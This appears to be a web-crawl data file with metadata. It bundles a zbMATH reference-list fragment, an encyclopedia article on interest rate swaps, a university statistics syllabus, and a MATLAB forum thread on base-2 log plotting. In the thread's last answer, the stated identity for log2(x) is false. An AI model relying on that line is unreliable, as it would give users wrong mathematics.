(1964), Wiley New York · Zbl 0137.24201\nThis reference list is based on information provided by the publisher or from digital mathematics libraries. Its items are heuristically matched to zbMATH identifiers and may contain data conversion errors. It attempts to reflect the references listed in the original paper as accurately as possible without claiming the completeness or perfect precision of the matching." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7002906,"math_prob":0.97812515,"size":3867,"snap":"2021-21-2021-25","text_gpt3_token_len":1187,"char_repetition_ratio":0.15169558,"word_repetition_ratio":0.010889292,"special_character_ratio":0.34471166,"punctuation_ratio":0.25841346,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9884371,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-06-14T12:03:36Z\",\"WARC-Record-ID\":\"<urn:uuid:68ba81ca-001d-4385-9d50-df15fd8007b1>\",\"Content-Length\":\"52513\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:73c6c4cb-4232-4c26-9ad0-9499a864ea18>\",\"WARC-Concurrent-To\":\"<urn:uuid:69cd0521-1968-475e-b385-8f6901e87f15>\",\"WARC-IP-Address\":\"141.66.194.3\",\"WARC-Target-URI\":\"https://www.zbmath.org/?q=an%3A1149.39024\",\"WARC-Payload-Digest\":\"sha1:KTPDNSNFCVB7DP6XJ2YLIVR4YLB7JQOM\",\"WARC-Block-Digest\":\"sha1:MS2LLVQETFE6IYZAR2IJQLV6TKVBJNKU\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-25/CC-MAIN-2021-25_segments_1623487612154.24_warc_CC-MAIN-20210614105241-20210614135241-00416.warc.gz\"}"}
http://wikien3.appspot.com/wiki/Interest_rate_swap
[ "# Interest rate swap\n\nIn finance, an interest rate swap (IRS) is an interest rate derivative (IRD). It involves exchange of interest rates between two parties. In particular it is a linear IRD and one of the most liquid, benchmark products. It has associations with forward rate agreements (FRAs), and with zero coupon swaps (ZCSs).\n\n## Interest rate swaps\n\n### General description", null, "Graphical depiction of IRS cashflows between two counterparties based on a notional amount of EUR100mm for a single (i'th) period exchange, where the floating index $r_{i}$", null, "will typically be an -IBOR index.\n\nAn interest rate swap's (IRS's) effective description is a derivative contract, agreed between two counterparties, which specifies the nature of an exchange of payments benchmarked against an interest rate index. The most common IRS is a fixed for floating swap, whereby one party will make payments to the other based on an initially agreed fixed rate of interest, to receive back payments based on a floating interest rate index. Each of these series of payments is termed a \"leg\", so a typical IRS has both a fixed and a floating leg. The floating index is commonly an interbank offered rate (IBOR) of specific tenor in the appropriate currency of the IRS, for example LIBOR in USD, GBP, EURIBOR in EUR, or STIBOR in SEK.\n\nTo completely determine any IRS a number of parameters must be specified for each leg: \n\nEach currency has its own standard market conventions regarding the frequency of payments, the day count conventions and the end-of-month rule.\n\n### Extended description\n\n There are several types of IRS, typically: \"Vanilla\" fixed for floating Basis swap Cross currency basis swaps Amortising swap Zero coupon swap Constant maturity swap Overnight indexed swap\n\nAs OTC instruments, interest rate swaps (IRSs) can be customised in a number of ways and can be structured to meet the specific needs of the counterparties. For example: payment dates could be irregular, the notional of the swap could be amortized over time, reset dates (or fixing dates) of the floating rate could be irregular, mandatory break clauses may be inserted into the contract, etc. A common form of customisation is often present in new issue swaps where the fixed leg cashflows are designed to replicate those cashflows received as the coupons on a purchased bond. The interbank market, however, only has a few standardised types.\n\nThere is no consensus on the scope of naming convention for different types of IRS. Even a wide description of IRS contracts only includes those whose legs are denominated in the same currency. It is generally accepted that swaps of similar nature whose legs are denominated in different currencies are called cross currency basis swaps. Swaps which are determined on a floating rate index in one currency but whose payments are denominated in another currency are called Quantos.\n\nIn traditional interest rate derivative terminology an IRS is a fixed leg versus floating leg derivative contract referencing an IBOR as the floating leg. If the floating leg is redefined to be an overnight index, such as EONIA, SONIA, FFOIS, etc. then this type of swap is generally referred to as an overnight indexed swap (OIS). 
Some financial literature may classify OISs as a subset of IRSs and other literature may recognise a distinct separation.\n\nFixed leg versus fixed leg swaps are rare, and generally constitute a form of specialised loan agreement.\n\nFloat leg versus float leg swaps are much more common. These are typically termed (single currency) basis swaps (SBSs). The legs on SBSs will necessarily be different interest indexes, such as 1M LIBOR, 3M LIBOR, 6M LIBOR, SONIA, etc. The pricing of these swaps requires a spread, often quoted in basis points, to be added to one of the floating legs in order to satisfy value equivalence.\n\n### Uses\n\nInterest rate swaps are used to hedge against or speculate on changes in interest rates.\n\nInterest rate swaps are also used speculatively by hedge funds or other investors who expect a change in interest rates or the relationships between them. Traditionally, fixed income investors who expected rates to fall would purchase cash bonds, whose value increased as rates fell. Today, investors with a similar view could enter a floating-for-fixed interest rate swap; as rates fall, investors would pay a lower floating rate in exchange for the same fixed rate.\n\nInterest rate swaps are also popular for the arbitrage opportunities they provide. Varying levels of creditworthiness mean that there is often a positive quality spread differential that allows both parties to benefit from an interest rate swap.\n\nThe interest rate swap market in USD is closely linked to the Eurodollar futures market, which trades, among other venues, at the Chicago Mercantile Exchange.\n\n## Valuation and pricing\n\nIRSs are bespoke financial products whose customisation can include changes to payment dates, notional changes (such as those in amortised IRSs), accrual period adjustment and calculation convention changes (such as a day count convention of 30/360E to ACT/360 or ACT/365).\n\nA vanilla IRS is the term used for standardised IRSs. Typically these will have none of the above customisations, and instead exhibit constant notional throughout, implied payment and accrual dates and benchmark calculation conventions by currency. A vanilla IRS is also characterised by one leg being 'fixed' and the second leg 'floating' referencing an -IBOR index. The net present value (PV) of a vanilla IRS can be computed by determining the PV of the fixed leg and the floating leg separately and summing. 
For pricing a mid-market IRS the underlying principle is that the two legs must have the same value initially; see further under Rational pricing.\n\nCalculating the fixed leg requires discounting all of the known cashflows by an appropriate discount factor:\n\n$P_{\\text{fixed}}=NR\\sum _{i=1}^{n_{1}}d_{i}v_{i}$", null, "where $N$", null, "is the notional, $R$", null, "is the fixed rate, $n_{1}$", null, "is the number of payments, $d_{i}$", null, "is the decimalised day count fraction of the accrual in the i'th period, and $v_{i}$", null, "is the discount factor associated with the payment date of the i'th period.\n\nCalculating the floating leg is a similar process replacing the fixed rate with forecast index rates:\n\n$P_{\\text{float}}=N\\sum _{j=1}^{n_{2}}r_{j}d_{j}v_{j}$", null, "where $n_{2}$", null, "is the number of payments of the floating leg and $r_{j}$", null, "are the forecast -IBOR index rates of the appropriate currency.\n\nThe PV of the IRS from the perspective of receiving the fixed leg is then:\n\n$P_{\\text{IRS}}=P_{\\text{fixed}}-P_{\\text{float}}$", null, "Historically IRSs were valued using discount factors derived from the same curve used to forecast the -IBOR rates. This has been called 'self-discounted'. Some early literature described some incoherence introduced by that approach and multiple banks were using different techniques to reduce them. It became more apparent with the 2007–2012 global financial crisis that the approach was not appropriate, and alignment towards discount factors associated with physical collateral of the IRSs was needed.\n\nPost crisis, to accommodate credit risk, the now-standard pricing framework is the multi-curves framework where forecast -IBOR rates and discount factors exhibit disparity. Note that the economic pricing principle is unchanged: leg values are still identical at initiation. See Financial economics § Derivative pricing for further context. Here, Overnight Index Swap (OIS) rates are typically used to derive discount factors, since that index is the standard inclusion on Credit Support Annexes (CSAs) to determine the rate of interest payable on collateral for IRS contracts. As regards the rates forecast, since the basis spread between LIBOR rates of different maturities widened during the crisis, forecast curves are generally constructed for each LIBOR tenor used in floating rate derivative legs.\n\nRegarding the curve build, see . Under the old framework a single self discounted curve was \"bootstrapped\", i.e. solved such that it exactly returned the observed prices of selected instruments, with the build proceeding sequentially, date-wise, through these instruments. Under the new framework, the various curves are best fitted to observed market prices — as a \"curve set\" — one curve for discounting, one for each IBOR-tenor \"forecast curve\". Here, since the observed average overnight rate is swapped for the -IBOR rate over the same period (the most liquid tenor in that market), and the -IBOR swaps are in turn discounted on the OIS curve, the problem entails a nonlinear system, where all curve points are solved at once, and specialized iterative methods are usually employed — very often a modification of Newton's method. Other tenor's curves can be solved in a \"second stage\", bootstrap-style.\n\nUnder both frameworks, the following apply. (i) Maturities for which rates are solved directly are referred to as \"pillar points\", these correspond to the input instrument maturities; other rates are interpolated. 
(ii) The objective function: prices must be \"exactly\" returned, as described. (iii) The penalty function will weigh: that forward rates are positive (to be arbitrage free) and curve \"smoothness\"; both, in turn, a function of the interpolation method. (iv) The initial estimate: often, the most recently solved curve set. ((v) All that need be stored are the pillar-values and the interpolation rule.)\n\nA CSA could allow for collateral, and hence interest payments on that collateral, in any currency. To address this banks include in their curve-set, a USD discount-curve sometimes called the \"basis-curve\", to be used for discounting local-IBOR trades with USD collateral. This curve is built by solving for observed (mark-to-market) cross-currency swap rates, where the local -IBOR is swapped for USD LIBOR with USD collateral as underpin; a pre-solved (external) USD LIBOR curve is therefore an input into the curve build (the basis-curve may be solved in the \"third stage\"). Each currency's curve-set will then include a local-currency discount-curve and its USD discounting basis-curve. As required, a third-currency discount curve — i.e. for local trades collateralized in a currency other than local or USD (or any other combination) — can then be constructed from the two basis-curves, i.e. of the local-currency and third-currency, as combined via an arbitrage relationship known as \"FX Forward Invariance\".\n\nThe complexities of modern curvesets mean that there may not be discount factors available for a specific -IBOR index curve. These curves are known as 'forecast only' curves and only contain the information of a forecast -IBOR index rate for any future date. Some designs constructed with a discount based methodology mean forecast -IBOR index rates are implied by the discount factors inherent to that curve:\n\n$r_{j}={\\frac {1}{d_{j}}}\\left({\\frac {x_{j-1}}{x_{j}}}-1\\right)$", null, "where $x_{i-1}$", null, "and $x_{i}$", null, "are the start and end discount factors associated with the relevant forward curve of a particular -IBOR index in a given currency.\n\nTo price the mid-market or par rate, $S$", null, "of an IRS (defined by the value of fixed rate $R$", null, "that gives a net PV of zero), the above formula is re-arranged to:\n\n$S={\\frac {\\sum _{j=1}^{n_{2}}r_{j}d_{j}v_{j}}{\\sum _{i=1}^{n_{1}}d_{i}v_{i}}}$", null, "In the event old methodologies are applied the discount factors $v_{k}$", null, "can be replaced with the self discounted values $x_{k}$", null, "and the above reduces to:\n\n$S={\\frac {x_{0}-x_{n_{2}}}{\\sum _{i=1}^{n_{1}}d_{i}x_{i}}}$", null, "In both cases, the PV of a general swap can be expressed exactly with the following intuitive formula:\n\n$P_{\\text{IRS}}=N(R-S)A$", null, "where $A$", null, "is the so-called Annuity factor $A=\\sum _{i=1}^{n_{1}}d_{i}v_{i}$", null, "(or $A=\\sum _{i=1}^{n_{1}}d_{i}x_{i}$", null, "for self-discounting). This shows that the PV of an IRS is roughly linear in the swap par rate (though small non-linearities arise from the co-dependency of the swap rate with the discount factors in the Annuity sum).\n\nDuring the life of the swap the same valuation technique is used, but since, over time, both the discounting factors and the forward rates change, the PV of the swap will deviate from its initial value. Therefore, the swap will be an asset to one party and a liability to the other. The way these changes in value are reported is the subject of IAS 39 for jurisdictions following IFRS, and FAS 133 for U.S. GAAP. 
Swaps are marked to market by debt security traders to visualize their inventory at a certain time. As regards P&L Attribution, and hedging, the new framework adds complexity in that the trader's position is now potentially affected by numerous instruments not obviously related to the trade in question.\n\n## Risks\n\nInterest rate swaps expose users to many different types of financial risk. Predominantly they expose the user to market risks and specifically interest rate risk. The value of an interest rate swap will change as market interest rates rise and fall. In market terminology this is often referred to as delta risk. Interest rate swaps also exhibit gamma risk whereby their delta risk increases or decreases as market interest rates fluctuate. (See Greeks (finance), Value at risk #Computation methods, Value at risk #VaR risk management. )\n\nOther specific types of market risk that interest rate swaps have exposure to are basis risks - where various IBOR tenor indexes can deviate from one another - and reset risks - where the publication of specific tenor IBOR indexes are subject to daily fluctuation.\n\nUncollateralised interest rate swaps - those executed bilaterally without a CSA in place - expose the trading counterparties to funding risks and credit risks. Funding risks because the value of the swap might deviate to become so negative that it is unaffordable and cannot be funded. Credit risks because the respective counterparty, for whom the value of the swap is positive, will be concerned about the opposing counterparty defaulting on its obligations. Collateralised interest rate swaps, on the other hand, expose the users to collateral risks: here, depending upon the terms of the CSA, the type of posted collateral that is permitted might become more or less expensive due to other extraneous market movements.\n\nCredit and funding risks still exist for collateralised trades but to a much lesser extent. Regardless, due to regulations set out in the Basel III Regulatory Frameworks, trading interest rate derivatives commands a capital usage. The consequence of this is that, dependent upon their specific nature, interest rate swaps might command more capital usage, and this can deviate with market movements. Thus capital risks are another concern for users.\n\nGiven these concerns, banks will typically calculate a credit valuation adjustment, as well as other x-valuation adjustments, which then incorporate these risks into the instrument value.\n\nReputation risks also exist. The mis-selling of swaps, over-exposure of municipalities to derivative contracts, and IBOR manipulation are examples of high-profile cases where trading interest rate swaps has led to a loss of reputation and fines by regulators.\n\nHedging interest rate swaps can be complicated and relies on numerical processes of well designed risk models to suggest reliable benchmark trades that mitigate all market risks; although, see the discussion above re hedging in a multi-curve environment. The other, aforementioned risks must be hedged using other systematic processes.\n\n## Quotation and Market-Making\n\n### ISDA Benchmark Swap Rates\n\nISDA, ICAP, and Reuters select a number of swap dealers based on their reputation, credit standing and scale of activity in each major currency. Those dealers are asked to provide swap rates for the designated maturities of a given currency within a polling window. 
Reuters will calculate the benchmark swap rate based on a simple average of the submitted rates after eliminating the highest and lowest ones and publish them.\n\n### Market-Making\n\nThe market-making of IRSs is an involved process involving multiple tasks; curve construction with reference to interbank markets, individual derivative contract pricing, risk management of credit, cash and capital. The cross disciplines required include quantitative analysis and mathematical expertise, disciplined and organized approach towards profits and losses, and coherent psychological and subjective assessment of financial market information and price-taker analysis. The time sensitive nature of markets also creates a pressurized environment. Many tools and techniques have been designed to improve efficiency of market-making in a drive to efficiency and consistency.\n\n## Trivia\n\nOn its December 2014 statistics release, the Bank for International Settlements reported that interest rate swaps were the largest component of the global OTC derivative market representing 60% of it, with the notional amount outstanding in OTC interest rate swaps of $381 trillion, and the gross market value of$14 trillion.\n\nInterest rate swaps can be traded as an index through the FTSE MTIRS Index.\n\n## Controversy\n\nIn June 1988 the Audit Commission was tipped off by someone working on the swaps desk of Goldman Sachs that the London Borough of Hammersmith and Fulham had a massive exposure to interest rate swaps. When the commission contacted the council, the chief executive told them not to worry as \"everybody knows that interest rates are going to fall\"; the treasurer thought the interest rate swaps were a \"nice little earner\". The Commission's Controller, Howard Davies, realised that the council had put all of its positions on interest rates going down and ordered an investigation.\n\nBy January 1989 the Commission obtained legal opinions from two Queen's Counsel. Although they did not agree, the commission preferred the opinion that it was ultra vires for councils to engage in interest rate swaps (ie. that they had no lawful power to do so). Moreover, interest rates had increased from 8% to 15%. The auditor and the commission then went to court and had the contracts declared void (appeals all the way up to the House of Lords failed in Hazell v Hammersmith and Fulham LBC); the five banks involved lost millions of pounds. Many other local authorities had been engaging in interest rate swaps in the 1980s. This resulted in several cases in which the banks generally lost their claims for compound interest on debts to councils, finalised in Westdeutsche Landesbank Girozentrale v Islington London Borough Council. Banks did, however, recover some funds where the derivatives were \"in the money\" for the Councils (ie, an asset showing a profit for the council, which it now had to return to the bank, not a debt)\n\nGeneral:\n\n• Leif B.G. Andersen, Vladimir V. Piterbarg (2010). Interest Rate Modeling in Three Volumes (1st ed. 2010 ed.). Atlantic Financial Press. ISBN 978-0-9844221-0-4. Archived from the original on 2011-02-08.\n• J H M Darbyshire (2017). Pricing and Trading Interest Rate Derivatives (2nd ed. 2017 ed.). Aitch and Dee Ltd. ISBN 978-0995455528.\n• Richard Flavell (2010). Swaps and other derivatives (2nd ed.) Wiley. ISBN 047072191X\n• Miron P. & Swannell P. (1991). Pricing and Hedging Swaps, Euromoney books\n\nEarly literature on the incoherence of the one curve pricing approach:\n\n• Boenkost W. 
and Schmidt W. (2004). Cross currency swap valuation, Working Paper 2, HfB - Business School of Finance & Management SSRN preprint.\n• Henrard M. (2007). The Irony in the Derivatives Discounting, Wilmott Magazine, pp. 92–98, July 2007. SSRN preprint.\n• Tuckman B. and Porfirio P. (2003). Interest rate parity, money market basis swaps and cross-currency basis swaps, Fixed income liquid markets research, Lehman Brothers\n\nMulti-curves framework:\n\n• Bianchetti M. (2010). Two Curves, One Price: Pricing & Hedging Interest Rate Derivatives Decoupling Forwarding and Discounting Yield Curves, Risk Magazine, August 2010. SSRN preprint.\n• Henrard M. (2010). The Irony in the Derivatives Discounting Part II: The Crisis, Wilmott Journal, Vol. 2, pp. 301–316, 2010. SSRN preprint.\n• Kijima M., Tanaka K., and Wong T. (2009). A multi-quality model of interest rates, Quantitative Finance, pages 133-145, 2009." ]
[ null, "http://upload.wikimedia.org/wikipedia/commons/9/96/IRSflows.png", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/a0b6d651eaf432dbf1f106021c8bb499ae83fd1f", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/97f2c16f949e76dc9ce34692f812f0a030ae2e27", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/f5e3890c981ae85503089652feb48b191b57aae3", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/4b0bfb3769bf24d80e15374dc37b0441e2616e33", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/ee784b70e772f55ede5e6e0bdc929994bff63413", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/abe3154db7d4f92fb42dd1f80f52f528c6312e4a", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/7dffe5726650f6daac54829972a94f38eb8ec127", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/bb3ee6926801fe0a68aca9a9aad0799ca03a9c67", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/840e456e3058bc0be28e5cf653b170cdbfcc3be4", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/a7d3b724fc249d56f0d550b92f6891380467e350", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/4ea68faa91fea0bd7762febb88e75d3a2fc08dba", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/e222bdf83f43415106c164c5216cdd7867dae115", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/db345bb67bd140474742faf5d2fff314daa04e33", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/e87000dd6142b81d041896a30fe58f0c3acb2158", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/4611d85173cd3b508e67077d4a1252c9c05abca2", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/4b0bfb3769bf24d80e15374dc37b0441e2616e33", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/0d943de012834efce945990ab63ebca4959bf18e", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/d142b4083872eb72f81c1e20fd2c91d02b4a9838", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/6d2b88c64c76a03611549fb9b4cf4ed060b56002", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/3def78f6d1d3107ae04b4712d15b5ce88d5c0662", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/72ee149f9f09885fab1fe6555c859a92b918f991", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/7daff47fa58cdfd29dc333def748ff5fa4c923e3", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/28a748c9d5df850e0ec41a87d9e6a212b26bc1a8", null, "https://wikimedia.org/api/rest_v1/media/math/render/svg/43471ac6ba66c0a19d41e13ac31164fcfa66a31d", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.92143303,"math_prob":0.89620143,"size":21954,"snap":"2019-51-2020-05","text_gpt3_token_len":4727,"char_repetition_ratio":0.14086561,"word_repetition_ratio":0.0043516103,"special_character_ratio":0.20820807,"punctuation_ratio":0.105344296,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9691183,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50],"im_url_duplicate_count":[null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-12-14T06:30:37Z\",\"WARC-Record-ID\":\"<urn:uuid:5cac9dd7-6f37-4915-a980-8d4a1a2e0e61>\",\"Content-Length\":\"120976\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:5156a9ad-47c6-4326-bf64-e3d072550b8f>\",\"WARC-Concurrent-To\":\"<urn:uuid:0b3fddac-74f3-4f7c-996b-c1c445297b47>\",\"WARC-IP-Address\":\"172.217.13.84\",\"WARC-Target-URI\":\"http://wikien3.appspot.com/wiki/Interest_rate_swap\",\"WARC-Payload-Digest\":\"sha1:W2XVBEG2QRIG4ANICP5J6T5XFFN45UU6\",\"WARC-Block-Digest\":\"sha1:DDVNA7RLH2MGDTTCPBZ6MI4MTRSXG34U\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-51/CC-MAIN-2019-51_segments_1575540584491.89_warc_CC-MAIN-20191214042241-20191214070241-00158.warc.gz\"}"}
http://www.agr.unizg.hr/hr/ects-en/bs_courses_taught_in_english/4/0/business_statistics_i/35
[ " Business Statistics I / BS Courses taught in English / / Sveučilište u Zagrebu Agronomski fakultet\n\n ECTS bodovi 6.00 Engleski jezik R1 E-učenje R1 Sati nastave 60 Predavanja 44 Vježbe u praktikumu 12 Seminar 4 Izvođač predavanja doc. dr. sc. Biserka Kolarec Izvođač vježbi doc. dr. sc. Biserka Kolarec Ocjenjivanje Dovoljan (2) 60-69% Dobar (3) 70-79 % Vrlo dobar (4) 80-89 % Izvrstan (5) 90 -100%\n\n## Nositelj predmeta", null, "doc. dr. sc. Biserka Kolarec\n\n## Opis predmeta\n\nThis module presents the basics of descriptive and inferential statistics in the context of agricultural economics. The part concerned with descriptive statistics pays special attention to organization, presentation, and interpretation of different types of data. The intention here is to develop an ability to critically assess and interpret statistical data and to avoid common pitfalls. A short review of basic concepts of probability is a bridge to the part devoted to the inferential statistics. This part starts by an introduction to discrete and continuous random variables and the most important distributions, followed by the classical topics of estimations and hypotheses testing about the mean and proportion.\n\n## Opće kompetencije\n\n- raising the level of statistical literacy\n- acquiring knowledge and skills necessary to understand, analyze and solve problems arising in the course of practical work\n- developing an ability to critically assess and interpret statistical data and to avoid common pitfalls\n- using statistical software with confidence\n\n## Oblici nastave\n\n• Assessments\n• Consultations\n• Lectures\nindividual work on concrete problems in order to acquire the level of statistical literacy necessary for understand, analyze and solve practical problems arising in the course of work in agricultural economics.\n• Practicum\non computers\n• Seminars\nsolving an individual problem\n\n## Ishodi učenja i način provjere\n\n Ishod učenja Način provjere organize data and present them grafically individual and practical work, project calculate numerical descriptive measures of data homework, exam, practical work apply Excel tools for descriptive statistics exam, practical work, project distinguish between discrete and continuous random variables and their probability distributions homework, practical work, project determinate probabilities and use statistical tables homework, practical work, project, exam construct confidence intervals for means and proportions homework, practical work, project set up a hypothesis and test it homework, practical work, project, exam be able to use mathematical software and interpret obtained results project work\n\n### Obaveze nastavnika\n\n1. Course planning\n2. Selection and creation of teaching materials\n3. Evaluation of course, teaching materials and curriculum\n4. Construct tests\n5. Grade students on the basis of their achievement\n\n### Obaveze studenta\n\n1. Attend lectures regularly\n2. Do homeworks and participate actively during lectures\n3. Write tests and win at least 25% of points on each test to get the signature\n4. 
Do individual projects\n\n## Examination\n\nAssessment element | Maximum points or share of grade | Grading scale | Grade | Hours of direct teaching | Total hours of work of an average student | ECTS credits\n1st exam 40 % 60-69 %\n70-79 %\n80-89 %\n90-100 %\nSufficient (2)\nGood (3)\nVery good (4)\nExcellent (5)\n30 90 2\n2nd exam 30 % 60-69 %\n70-79 %\n80-89 %\n90-100 %\nSufficient (2)\nGood (3)\nVery good (4)\nExcellent (5)\n15 45 2\n3rd exam 30 % 60-69 %\n70-79 %\n80-89 %\n90-100 %\nSufficient (2)\nGood (3)\nVery good (4)\nExcellent (5)\n15 45 2\nTotal 100 % 60 180 6\n3rd exam: interval estimations and hypothesis testing, 16th week\n\n## Weekly teaching plan\n\n1. The purpose of statistics. Descriptive and inferential statistics. Basic concepts. Types of variables. Scales of measurement.\n2. Organizing and graphing of qualitative and quantitative data. Interpretation of different types of diagrams. Recognizing and avoiding common pitfalls.\n3. Measures of central tendency – mean, median and mode. Measures of dispersion. Measures of position.\n4. Index theory. Measures of association: basic definitions and examples from economic theory; types of measures of association.\n5. Elements of probability I: Experiment, outcomes and sample space. Three conceptual approaches to probability. Examples.\n6. Elements of probability II: Dependent versus independent events. Conditional probability. Bayes' theorem.\n7. Discrete random variables and their probability distributions I: Probability distribution of a discrete random variable. Mean and standard deviation. The binomial probability distribution.\n8. Discrete random variables and their probability distributions II: The Poisson probability distribution. The hypergeometric probability distribution.\n9. Continuous random variables and their probability distributions I: Continuous probability distribution. The normal distribution. The standard normal distribution. Applications.\n10. Continuous random variables and their probability distributions II: The normal approximation to the binomial distribution.\n11. Populations and samples: Random and nonrandom samples. Selecting a simple random sample. Sampling errors.\n12. Estimation of the mean: Point and interval estimates. Interval estimation of a population mean for large and small samples. The t probability distribution.\n13. Estimation of the proportion: Interval estimates of a population proportion. Sample size determination.\n14. Hypothesis tests about the mean: Hypothesis tests. Rejection and non-rejection regions. Two types of errors. Hypothesis tests about a population mean for large and small samples.\n15. Hypothesis tests about the proportion: Hypothesis tests about a population proportion.\n\n## Required reading\n\n1. P.S. Mann, Statistics for Business and Economics, J. Wiley, N.Y., 2005.\n2. M. Silver, Business Statistics, McGraw-Hill, London, 1997.\n\n## Recommended reading\n\n1. L. Kazmier, Schaum's Easy Outline of Business Statistics, McGraw-Hill, N.Y., 2003.\n2. D. Huff, How to Lie with Statistics, W. W. Norton, N.Y., 1993.\n\n## Similar courses at related universities\n\n• Matematik und Statistik, BOKU\n• Statistik, University of Hohenheim" ]
[ null, "https://djelatnici.agr.hr/multimedia/users/picture.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.74790704,"math_prob":0.83377624,"size":6267,"snap":"2019-51-2020-05","text_gpt3_token_len":1545,"char_repetition_ratio":0.13316302,"word_repetition_ratio":0.13076924,"special_character_ratio":0.22387107,"punctuation_ratio":0.1256182,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9780987,"pos_list":[0,1,2],"im_url_duplicate_count":[null,10,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-12-06T02:59:59Z\",\"WARC-Record-ID\":\"<urn:uuid:c519fbde-6400-4e6e-8dc2-23e94cf86f62>\",\"Content-Length\":\"34768\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:f239babc-cc4f-40b6-aa4c-86342f8ee974>\",\"WARC-Concurrent-To\":\"<urn:uuid:065a972b-0a20-4827-9ae2-d5637ac08a8d>\",\"WARC-IP-Address\":\"31.147.204.159\",\"WARC-Target-URI\":\"http://www.agr.unizg.hr/hr/ects-en/bs_courses_taught_in_english/4/0/business_statistics_i/35\",\"WARC-Payload-Digest\":\"sha1:J3IR6QH6LLPA7NCRGRVINNDNUTRSVDOS\",\"WARC-Block-Digest\":\"sha1:DSPSC4JYWFOYWPRAG6GAKF4UCLRCXORI\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-51/CC-MAIN-2019-51_segments_1575540484477.5_warc_CC-MAIN-20191206023204-20191206051204-00408.warc.gz\"}"}
https://au.mathworks.com/matlabcentral/answers/579159-logarithmic-scale-with-a-different-base
[ "# Logarithmic scale with a different base\n\n55 views (last 30 days)\nIdo Gross on 13 Aug 2020\nAnswered: Walter Roberson on 13 Aug 2020\nHi,\nI am trying to plot a function using logaritmic scale on the x axis, with base 2.\nmy code is:\nN = 1:10000;\nM = 61;\nL = N-M+1;\nova_complex = ((N.*(log2(N)+1))./(N-M+1));\nfigure\nstem(log2(N),ova_complex)\nxlim([6 14])\nthe graph im getting is good, but i want to show only the integer values on the x axis(i.e. 6,7,8,9)\nis there a way to do that?\nthanks\n\nStar Strider on 13 Aug 2020\nTry this:\nN = 1:10000;\nM = 61;\nL = N-M+1;\nova_complex = ((N.*(log2(N)+1))./(N-M+1));\nfigure\nstem(log2(N),ova_complex)\nxlim([6 14])\nxt = get(gca, 'XTick'); % ADD THIS LINE\nxtl = fix(min(xt)):fix(max(xt)); % ADD THIS LINE\nset(gca, 'XTick',xtl) % ADD THIS LINE\nThat should produce integer ticks and integer tick labels.\n.\n\nhosein Javan on 13 Aug 2020\nax = gca; % current axe\nax.XTick = 6:14;\n\nWalter Roberson on 13 Aug 2020\nlog2(x) = log(x) *log(2)\nlog(2) is a uniform scaling and since plots are scaled to fit available space, becomes irrelevant.\nSo you get the same shape if you use semilogx. And you can lie with the labels if you want. However if you are using datatips you need your approach (unless you program them to lie)\nYou can use xticks() to choose integer tick locations." ]
[ null ]
